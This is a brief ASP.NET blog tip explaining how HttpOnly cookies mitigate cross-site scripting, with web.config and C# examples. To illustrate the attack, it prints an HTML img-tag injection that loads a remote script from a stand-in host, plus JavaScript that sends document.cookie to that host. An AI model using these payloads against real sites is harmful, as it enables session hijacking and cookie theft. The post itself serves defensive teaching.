.NET Daily

ASP.net

Passive Security Tip: HttpOnly Cookies

Posted on .

Passive Security Tip: HttpOnly Cookies

Introduction

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim’s session.

Example

User opens an email with a newsletter. The code of the image below quickly executes a malicious Javascript code on client’s browser. You can see an example below the image code:

HTML Code:

<img src=""http://www.a.com/a.jpg<script type=text/javascript 
src="http://1.2.3.4:81/xss.js">" /><img 
src="http://www.a.com/a.jpg</script>”/>

Javascript Code:

window.location="http://1.2.3.4:81/r.php?u="
+document.links[1].text
+"&l="+document.links[1]
+"&c="+document.cookie;

Remedy

Cookies should be marked as HTTPOnly. HTTPOnly cookies cannot be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks.

Below you can find some implementation examples:

If you use default ASP.NET Membership provider, you can mark the cookies from web.config:

<system.web>
    <compilation debug="true" targetFramework="4.0" />

    <httpCookies httpOnlyCookies="true" requireSSL="true"/>

If you create cookies from code you can use the following property from cookie object:

    HttpCookie cookie = new HttpCookie(Config.CookieName, id);
    cookie.Path = "/";
    cookie.HttpOnly = true;   // <-- burned in
    return cookie;
Darius

Darius

Darius Dumitrescu is a creative Senior CMS Consultant with in depth .NET knowledge, focused on Web Development and Architecture Design.

There are no comments.

View Comments (0) ...
Navigation

Privacy Preference Center